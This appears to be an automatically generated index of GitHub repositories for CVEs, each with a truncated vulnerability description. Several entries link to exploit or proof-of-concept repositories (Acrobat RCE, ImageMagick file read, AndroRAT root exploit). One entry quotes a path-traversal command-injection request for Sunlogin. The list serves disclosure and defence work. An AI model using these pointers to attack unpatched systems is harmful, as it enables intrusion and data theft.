**A vulnerability was found in Kong lua-multipart 0.5.8-1. It has been declared as problematic. This vulnerability affects the function is_header of the file src/multipart.lua. The manipulation leads to inefficient regular expression complexity. Upgrading to version 0.5.9-1 is able to address this issue. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36661](https://github.com/Live-Hack-CVE/CVE-2020-36661) create time: 2023-02-13T13:42:38Z

**Driver Distributor v2.2.3.1 and earlier contains a vulnerability where passwords are stored in a recoverable format. If an attacker obtains a configuration file of Driver Distributor, the encrypted administrator's credentials may be decrypted. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43460](https://github.com/Live-Hack-CVE/CVE-2022-43460) create time: 2023-02-13T13:41:56Z

**Ichiran App for iOS versions prior to 3.1.0 and Ichiran App for Android versions prior to 3.1.0 improperly verify server certificates, which may allow a remote unauthenticated attacker to eavesdrop on an encrypted communication via a man-in-the-middle attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22367](https://github.com/Live-Hack-CVE/CVE-2023-22367) create time: 2023-02-13T13:42:31Z

**SUSHIRO App for Android outputs sensitive information to the log file, which may result in an attacker obtaining a credential information from the log file. Affected products/versions are as follows: SUSHIRO Ver.4.0.31, Thailand SUSHIRO Ver.1.0.0, Hong Kong SUSHIRO Ver.3.0.2, Singapore SUSHIRO Ver.2.0.0, and Taiwan SUS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22362](https://github.com/Live-Hack-CVE/CVE-2023-22362) create time: 2023-02-13T13:42:28Z

**Use-after free vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier due to lack of error handling process even when an error was detected. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22360](https://github.com/Live-Hack-CVE/CVE-2023-22360) create time: 2023-02-13T13:42:23Z

**Out-of-bound read vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier because the end of data cannot be verified when processing control management information. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22353](https://github.com/Live-Hack-CVE/CVE-2023-22353) create time: 2023-02-13T13:42:19Z

**Out-of-bound read vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier because the end of data cannot be verified when processing parts management information. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22350](https://github.com/Live-Hack-CVE/CVE-2023-22350) create time: 2023-02-13T13:42:15Z

**Out-of-bound read vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier because the end of data cannot be verified when processing screen management information. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22349](https://github.com/Live-Hack-CVE/CVE-2023-22349) create time: 2023-02-13T13:42:11Z

**Out-of-bound read vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier because the end of data cannot be verified when processing file structure information. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitrary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22347](https://github.com/Live-Hack-CVE/CVE-2023-22347) create time: 2023-02-13T13:42:07Z

**Out-of-bound read vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier because the end of data cannot be verified when processing template information. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitrary code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22346](https://github.com/Live-Hack-CVE/CVE-2023-22346) create time: 2023-02-13T13:42:04Z

**Out-of-bound write vulnerability exists in Screen Creator Advance 2 Ver.0.1.1.4 Build01 and earlier due to lack of error handling process when out of specification errors are detected. Having a user of Screen Creator Advance 2 to open a specially crafted project file may lead to information disclosure and/or arbitrary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22345](https://github.com/Live-Hack-CVE/CVE-2023-22345) create time: 2023-02-13T13:42:00Z

**A vulnerability was found in Deye/Revolt/Bosswerk Inverter MW3_15U_5406_1.47/MW3_15U_5406_1.471. It has been rated as problematic. This issue affects some unknown processing of the component Access Point Setting Handler. The manipulation with the input 12345678 leads to use of hard-coded password. It is possible to lau CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0808](https://github.com/Live-Hack-CVE/CVE-2023-0808) create time: 2023-02-13T13:41:46Z

**Local privilege escalation due to incomplete uninstallation cleanup. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107, Acronis Agent (Windows) before build 30025, Acronis Cyber Protect 15 (Windows) before build 30984. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45455](https://github.com/Live-Hack-CVE/CVE-2022-45455) create time: 2023-02-13T12:31:22Z

**Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Agent (Windows) before build 30161, Acronis Cyber Protect 15 (Windows) before build 30984. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45454](https://github.com/Live-Hack-CVE/CVE-2022-45454) create time: 2023-02-13T12:31:18Z

**Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 10.0.0.5 and below contains an authorization bypass vulnerability, allowing users to perform actions in which they are not authorized. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34397](https://github.com/Live-Hack-CVE/CVE-2022-34397) create time: 2023-02-13T12:31:15Z

**In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25727](https://github.com/Live-Hack-CVE/CVE-2023-25727) create time: 2023-02-13T12:31:33Z

**Dell Command | Integration Suite for System Center, versions before 6.4.0 contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24572](https://github.com/Live-Hack-CVE/CVE-2023-24572) create time: 2023-02-13T12:31:29Z

**Dell Command | Intel vPro Out of Band, versions before 4.4.0, contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23697](https://github.com/Live-Hack-CVE/CVE-2023-23697) create time: 2023-02-13T12:31:26Z

**no description** : [w3security/CVE-2020-2551](https://github.com/w3security/CVE-2020-2551) create time: 2023-02-13T09:41:22Z

**An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14634](https://github.com/Live-Hack-CVE/CVE-2018-14634) create time: 2023-02-13T06:49:41Z

**A flaw was found in Wildfly 9.x. A path traversal vulnerability through the org.wildfly.extension.undertow.deployment.ServletResourceManager.getResource method could lead to information disclosure of arbitrary local files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1047](https://github.com/Live-Hack-CVE/CVE-2018-1047) create time: 2023-02-13T06:49:37Z

**An allocation of memory without limits, that could result in the stack clashing with another memory region, was discovered in systemd-journald when many entries are sent to the journal socket. A local attacker, or a remote one if systemd-journal-remote is used, may use this flaw to crash systemd-journald or execute cod CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16865](https://github.com/Live-Hack-CVE/CVE-2018-16865) create time: 2023-02-13T06:49:34Z

**A flaw was found in the Linux kernel's NFS41+ subsystem. NFS41+ shares mounted in different network namespaces at the same time can make bc_svc_process() use wrong back-channel IDs and cause a use-after-free vulnerability. Thus a malicious container user can cause a host kernel memory corruption and a system panic. Due CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16884](https://github.com/Live-Hack-CVE/CVE-2018-16884) create time: 2023-02-13T06:49:30Z

**Ceph does not properly sanitize encryption keys in debug logging for v4 auth. This results in the leaking of encryption key information in log files via plaintext. Versions up to v13.2.4 are vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16889](https://github.com/Live-Hack-CVE/CVE-2018-16889) create time: 2023-02-13T06:49:27Z

**A flaw was found in the Linux kernel that allows the userspace to call memcpy_fromiovecend() and similar functions with a zero offset and buffer length which causes the read beyond the buffer boundaries, in certain cases causing a memory access fault and a system halt by accessing invalid memory address. This issue onl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16885](https://github.com/Live-Hack-CVE/CVE-2018-16885) create time: 2023-02-13T06:49:24Z

**An out of bounds read was discovered in systemd-journald in the way it parses log messages that terminate with a colon ':'. A local attacker can use this flaw to disclose process memory data. Versions from v221 to v239 are vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16866](https://github.com/Live-Hack-CVE/CVE-2018-16866) create time: 2023-02-13T06:49:20Z

**The netfilter subsystem in the Linux kernel through 4.15.7 mishandles the case of a rule blob that contains a jump but lacks a user-defined chain, which allows local users to cause a denial of service (NULL pointer dereference) by leveraging the CAP_NET_RAW or CAP_NET_ADMIN capability, related to arpt_do_table in net/i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1065](https://github.com/Live-Hack-CVE/CVE-2018-1065) create time: 2023-02-13T06:49:16Z

**A cross-site request forgery flaw was found in etcd 3.3.1 and earlier. An attacker can set up a website that tries to send a POST request to the etcd server and modify a key. Adding a key is done with PUT so it is theoretically safe (can't PUT from an HTML form or such) but POST allows creating in-order keys that an at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1098](https://github.com/Live-Hack-CVE/CVE-2018-1098) create time: 2023-02-13T06:49:13Z

**The ext4_fill_super function in fs/ext4/super.c in the Linux kernel through 4.15.15 does not always initialize the crc32c checksum driver, which allows attackers to cause a denial of service (ext4_xattr_inode_hash NULL pointer dereference and system crash) via a crafted ext4 image. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1094](https://github.com/Live-Hack-CVE/CVE-2018-1094) create time: 2023-02-13T06:49:09Z

**A flaw was found in foreman before 1.16.1. The issue allows users with limited permissions for powering oVirt/RHV hosts on and off to discover the username and password used to connect to the compute resource. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1097](https://github.com/Live-Hack-CVE/CVE-2018-1097) create time: 2023-02-13T06:49:05Z

**zsh through version 5.4.2 is vulnerable to a stack-based buffer overflow in the utils.c:checkmailpath function. A local attacker could exploit this to execute arbitrary code in the context of another user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1100](https://github.com/Live-Hack-CVE/CVE-2018-1100) create time: 2023-02-13T06:49:01Z

**ovirt-engine up to version 4.2.3 is vulnerable to an unfiltered password when choosing manual db provisioning. When engine-setup was run and one chooses to provision the database manually or connect to a remote database, the password input was logged in cleartext during the verification step. Sharing the provisioning l CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1075](https://github.com/Live-Hack-CVE/CVE-2018-1075) create time: 2023-02-13T06:48:57Z

**A privilege escalation flaw was found in gluster 3.x snapshot scheduler. Any gluster client allowed to mount gluster volumes could also mount shared gluster storage volume and escalate privileges by scheduling malicious cronjob via symlink. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1088](https://github.com/Live-Hack-CVE/CVE-2018-1088) create time: 2023-02-13T06:48:53Z

**Linux kernel vhost since version 4.8 does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1118](https://github.com/Live-Hack-CVE/CVE-2018-1118) create time: 2023-02-13T06:48:50Z

**The ext4_xattr_check_entries function in fs/ext4/xattr.c in the Linux kernel through 4.15.15 does not properly validate xattr sizes, which causes misinterpretation of a size as an error code, and consequently allows attackers to cause a denial of service (get_acl NULL pointer dereference and system crash) via a crafted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1095](https://github.com/Live-Hack-CVE/CVE-2018-1095) create time: 2023-02-13T06:48:46Z

**Authenticated (admin+) Persistent Cross-Site Scripting (XSS) vulnerability discovered in Download Monitor WordPress plugin (versions <= 4.4.6) Vulnerable parameters: &post_title, &downloadable_file_version[0]. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23174](https://github.com/Live-Hack-CVE/CVE-2021-23174) create time: 2023-02-13T06:48:42Z

**Multiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23209](https://github.com/Live-Hack-CVE/CVE-2021-23209) create time: 2023-02-13T06:48:39Z

**Sunlogin Sunflower Simplified (aka Sunflower Simple and Personal) 1.0.1.43315 is vulnerable to a path traversal issue. A remote and unauthenticated attacker can execute arbitrary programs on the victim host by sending a crafted HTTP request, as demonstrated by /check?cmd=ping../ followed by the pathname of the powershe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48323](https://github.com/Live-Hack-CVE/CVE-2022-48323) create time: 2023-02-13T06:48:31Z

**NETGEAR Nighthawk WiFi Mesh systems and routers are affected by a stack-based buffer overflow vulnerability. This affects MR60 before 1.1.7.132, MS60 before 1.1.7.132, R6900P before 1.3.3.154, R7000P before 1.3.3.154, R7960P before 1.4.4.94, and R8000P before 1.4.4.94. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48322](https://github.com/Live-Hack-CVE/CVE-2022-48322) create time: 2023-02-13T06:48:28Z

**Versions of the package glance before 3.0.9 are vulnerable to Directory Traversal that allows users to read files outside the public root directory. This is related to but distinct from the vulnerability reported in [CVE-2018-3715](https://security.snyk.io/vuln/npm:glance:20180129). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25937](https://github.com/Live-Hack-CVE/CVE-2022-25937) create time: 2023-02-13T06:48:25Z

**Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit** : [Malwareman007/CVE-2023-21608](https://github.com/Malwareman007/CVE-2023-21608) create time: 2023-02-13T06:11:40Z

**Foreman before 1.8.4 and 1.9.x before 1.9.1 do not properly apply view_hosts permissions, which allows (1) remote authenticated users with the view_reports permission to read reports from arbitrary hosts or (2) remote authenticated users with the destroy_reports permission to delete reports from arbitrary hosts via dir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5233](https://github.com/Live-Hack-CVE/CVE-2015-5233) create time: 2023-02-13T02:27:39Z

**Directory traversal vulnerability in Kubernetes, as used in Red Hat OpenShift Enterprise 3.0, allows attackers to write to arbitrary files via a crafted object type name, which is not properly handled before passing it to etcd. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5305](https://github.com/Live-Hack-CVE/CVE-2015-5305) create time: 2023-02-13T02:27:35Z

**The TripleO Heat templates (tripleo-heat-templates), as used in Red Hat Enterprise Linux OpenStack Platform 7.0, do not properly use the configured RabbitMQ credentials, which makes it easier for remote attackers to obtain access to services in deployed overclouds by leveraging knowledge of the default credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5329](https://github.com/Live-Hack-CVE/CVE-2015-5329) create time: 2023-02-13T02:27:32Z

**The template-validate command in OpenStack Orchestration API (Heat) before 2015.1.3 (kilo) and 5.0.x before 5.0.1 (liberty) allows remote authenticated users to cause a denial of service (memory consumption) or determine the existence of local files via the resource type in a template, as demonstrated by file:///dev/ze CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5295](https://github.com/Live-Hack-CVE/CVE-2015-5295) create time: 2023-02-13T02:27:29Z

**Directory traversal vulnerability in the virStorageBackendFileSystemVolCreate function in storage/storage_backend_fs.c in libvirt, when fine-grained Access Control Lists (ACL) are in effect, allows local users with storage_vol:create ACL but not domain:write permission to write to arbitrary files via a .. (dot dot) in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5313](https://github.com/Live-Hack-CVE/CVE-2015-5313) create time: 2023-02-13T02:27:26Z

**Memory leak in the Privilege Attribute Certificate (PAC) responder plugin (sssd_pac_plugin.so) in System Security Services Daemon (SSSD) 1.10 before 1.13.1 allows remote authenticated users to cause a denial of service (memory consumption) via a large number of logins that trigger parsing of PAC blobs during Kerberos a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5292](https://github.com/Live-Hack-CVE/CVE-2015-5292) create time: 2023-02-13T02:27:22Z

**libreport 2.0.7 before 2.6.3 only saves changes to the first file when editing a crash report, which allows remote attackers to obtain sensitive information via unspecified vectors related to the (1) backtrace, (2) cmdline, (3) environ, (4) open_fds, (5) maps, (6) smaps, (7) hostname, (8) remote, (9) ks.cfg, or (10) an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5302](https://github.com/Live-Hack-CVE/CVE-2015-5302) create time: 2023-02-13T02:27:19Z

**Red Hat CloudForms 3.2 Management Engine (CFME) 5.4.4 and CloudForms 4.0 Management Engine (CFME) 5.5.0 do not properly encrypt data in the backend PostgreSQL database, which might allow local users to obtain sensitive data and consequently gain privileges by leveraging access to (1) database exports or (2) log files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7502](https://github.com/Live-Hack-CVE/CVE-2015-7502) create time: 2023-02-13T02:27:16Z

**The xmlParseMisc function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to cause a denial of service (out-of-bounds heap read) via unspecified vectors related to incorrect entities boundaries and start tags. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7500](https://github.com/Live-Hack-CVE/CVE-2015-7500) create time: 2023-02-13T02:27:12Z

**Heap-based buffer overflow in the xmlGROW function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to obtain sensitive process memory information via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7499](https://github.com/Live-Hack-CVE/CVE-2015-7499) create time: 2023-02-13T02:27:09Z

**Heap-based buffer overflow in the pcnet_receive function in hw/net/pcnet.c in QEMU allows guest OS administrators to cause a denial of service (instance crash) or possibly execute arbitrary code via a series of packets in loopback mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7504](https://github.com/Live-Hack-CVE/CVE-2015-7504) create time: 2023-02-13T02:27:05Z

**Buffer overflow in the pcnet_receive function in hw/net/pcnet.c in QEMU, when a guest NIC has a larger MTU, allows remote attackers to cause a denial of service (guest OS crash) or execute arbitrary code via a large packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7512](https://github.com/Live-Hack-CVE/CVE-2015-7512) create time: 2023-02-13T02:27:02Z

**redhat-support-plugin-rhev in Red Hat Enterprise Virtualization Manager (aka RHEV Manager) before 3.6 allows remote authenticated users with the SuperUser role on any Entity to execute arbitrary commands on any host in the RHEV environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7544](https://github.com/Live-Hack-CVE/CVE-2015-7544) create time: 2023-02-13T02:26:59Z

**The MSI-X MMIO support in hw/pci/msix.c in QEMU (aka Quick Emulator) allows local guest OS privileged users to cause a denial of service (NULL pointer dereference and QEMU process crash) by leveraging failure to define the .write method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7549](https://github.com/Live-Hack-CVE/CVE-2015-7549) create time: 2023-02-13T02:26:55Z

**sosreport in SoS 3.x allows local users to obtain sensitive information from sosreport files or gain privileges via a symlink attack on an archive file in a temporary directory, as demonstrated by sosreport-$hostname-$date.tar in /tmp/sosreport-$hostname-$date. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7529](https://github.com/Live-Hack-CVE/CVE-2015-7529) create time: 2023-02-13T02:26:52Z

**fs/ext4/namei.c in the Linux kernel before 3.7 allows physically proximate attackers to cause a denial of service (system crash) via a crafted no-journal filesystem, a related issue to CVE-2013-2015. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7509](https://github.com/Live-Hack-CVE/CVE-2015-7509) create time: 2023-02-13T02:26:48Z

**Qemu, when built with VNC display driver support, allows remote attackers to cause a denial of service (arithmetic exception and application crash) via crafted SetPixelFormat messages from a client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8504](https://github.com/Live-Hack-CVE/CVE-2015-8504) create time: 2023-02-13T02:26:45Z

**QEMU (aka Quick Emulator) built with a VMWARE VMXNET3 paravirtual NIC emulator support is vulnerable to crash issue. It occurs when a guest sends a Layer-2 packet smaller than 22 bytes. A privileged (CAP_SYS_RAWIO) guest user could use this flaw to crash the QEMU process instance resulting in DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8744](https://github.com/Live-Hack-CVE/CVE-2015-8744) create time: 2023-02-13T02:26:41Z

**The ext4 implementation in the Linux kernel before 2.6.34 does not properly track the initialization of certain data structures, which allows physically proximate attackers to cause a denial of service (NULL pointer dereference and panic) via a crafted USB device, related to the ext4_fill_super function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8324](https://github.com/Live-Hack-CVE/CVE-2015-8324) create time: 2023-02-13T02:26:37Z

**Race condition in the kernel in Red Hat Enterprise Linux 7, kernel-rt and Red Hat Enterprise MRG 2, when the nfnetlink_log module is loaded, allows local users to cause a denial of service (panic) by creating netlink sockets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7553](https://github.com/Live-Hack-CVE/CVE-2015-7553) create time: 2023-02-13T02:26:34Z

**The key_gc_unused_keys function in security/keys/gc.c in the Linux kernel through 4.2.6 allows local users to cause a denial of service (OOPS) via crafted keyctl commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7872](https://github.com/Live-Hack-CVE/CVE-2015-7872) create time: 2023-02-13T02:26:30Z

**The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8660](https://github.com/Live-Hack-CVE/CVE-2015-8660) create time: 2023-02-13T02:26:27Z

**OpenStack Compute (Nova) before 2014.2.4 (juno) and 2015.1.x before 2015.1.2 (kilo) do not properly apply security group changes, which allows remote attackers to bypass intended restriction by leveraging an instance that was running when the change was made. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7713](https://github.com/Live-Hack-CVE/CVE-2015-7713) create time: 2023-02-13T02:26:23Z

**QEMU (aka Quick Emulator) built with a VMWARE VMXNET3 paravirtual NIC emulator support is vulnerable to crash issue. It could occur while reading Interrupt Mask Registers (IMR). A privileged (CAP_SYS_RAWIO) guest user could use this flaw to crash the QEMU process instance resulting in DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8745](https://github.com/Live-Hack-CVE/CVE-2015-8745) create time: 2023-02-13T02:26:19Z

**crypto/algif_skcipher.c in the Linux kernel before 4.4.2 does not verify that a setkey operation has been performed on an AF_ALG socket before an accept system call is processed, which allows local users to cause a denial of service (NULL pointer dereference and system crash) via a crafted application that does not sup CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8970](https://github.com/Live-Hack-CVE/CVE-2015-8970) create time: 2023-02-13T02:26:15Z

**CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit** : [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268) create time: 2023-02-13T02:00:51Z

**AndroRAT is a capability that can be used to inject a root exploit as a silent installation to perform a malicious task on the device. This AndroRAT is designed to exploit CVE-2015-1805, a vulnerability that was discovered and made public in 2016.** : [ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805](https://github.com/ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805) create time: 2023-02-12T23:00:18Z

**** DISPUTED ** Memory leak in Pidgin 2.0.0, and possibly other versions, allows remote attackers to cause a denial of service (memory consumption) via malformed XML documents. NOTE: this issue has been disputed by the upstream vendor, who states: "I was never able to identify a scenario under which a problem occurred a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-2956](https://github.com/Live-Hack-CVE/CVE-2008-2956) create time: 2023-02-12T22:00:20Z

**** DISPUTED ** main/streams/plain_wrapper.c in PHP 5.3.x before 5.3.1 does not recognize the safe_mode_include_dir directive, which allows context-dependent attackers to have an unknown impact by triggering the failure of PHP scripts that perform include or require operations, as demonstrated by a script that attempts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3559](https://github.com/Live-Hack-CVE/CVE-2009-3559) create time: 2023-02-12T22:00:10Z

**** DISPUTED ** lxsession-logout in lxsession in LXDE, as used on SUSE openSUSE 11.3 and other platforms, does not lock the screen when the Suspend or Hibernate button is pressed, which might make it easier for physically proximate attackers to access an unattended laptop via a resume action. NOTE: there is no general a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-2532](https://github.com/Live-Hack-CVE/CVE-2010-2532) create time: 2023-02-12T22:00:07Z

**** DISPUTED ** Integer signedness error in the pmcraid_ioctl_passthrough function in drivers/scsi/pmcraid.c in the Linux kernel before 3.1 might allow local users to cause a denial of service (memory consumption or memory corruption) via a negative size value in an ioctl call. NOTE: this may be a vulnerability only in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2906](https://github.com/Live-Hack-CVE/CVE-2011-2906) create time: 2023-02-12T22:00:24Z

**** DISPUTED ** Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3640](https://github.com/Live-Hack-CVE/CVE-2011-3640) create time: 2023-02-12T22:00:03Z

**** DISPUTED ** GLib 2.31.8 and earlier, when the g_str_hash function is used, computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash tab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0039](https://github.com/Live-Hack-CVE/CVE-2012-0039) create time: 2023-02-12T22:00:34Z

**** DISPUTED ** Buffer overflow in the SQLDriverConnect function in unixODBC 2.3.1 allows local users to cause a denial of service (crash) via a long string in the DRIVER option. NOTE: this issue might not be a vulnerability, since the ability to set this option typically implies that the attacker already has legitimate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2658](https://github.com/Live-Hack-CVE/CVE-2012-2658) create time: 2023-02-12T22:00:27Z

**** DISPUTED ** Buffer overflow in the SQLDriverConnect function in unixODBC 2.0.10, 2.3.1, and earlier allows local users to cause a denial of service (crash) via a long string in the FILEDSN option. NOTE: this issue might not be a vulnerability, since the ability to set this option typically implies that the attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2657](https://github.com/Live-Hack-CVE/CVE-2012-2657) create time: 2023-02-12T22:00:17Z

**** DISPUTED ** Cross-site request forgery (CSRF) vulnerability in doku.php in DokuWiki 2012-01-25 Angua allows remote attackers to hijack the authentication of administrators for requests that add arbitrary users. NOTE: this issue has been disputed by the vendor, who states that it is resultant from CVE-2012-2129: "the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2128](https://github.com/Live-Hack-CVE/CVE-2012-2128) create time: 2023-02-12T22:00:14Z

**** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5613](https://github.com/Live-Hack-CVE/CVE-2012-5613) create time: 2023-02-12T21:59:59Z

**** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0346](https://github.com/Live-Hack-CVE/CVE-2013-0346) create time: 2023-02-12T22:00:31Z

**A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25103](https://github.com/Live-Hack-CVE/CVE-2019-25103) create time: 2023-02-12T17:36:24Z

**A vulnerability, which was classified as problematic, has been found in atwellpub Resend Welcome Email Plugin 1.0.1. This issue affects the function send_welcome_email_url of the file resend-welcome-email.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10078](https://github.com/Live-Hack-CVE/CVE-2015-10078) create time: 2023-02-12T15:25:49Z

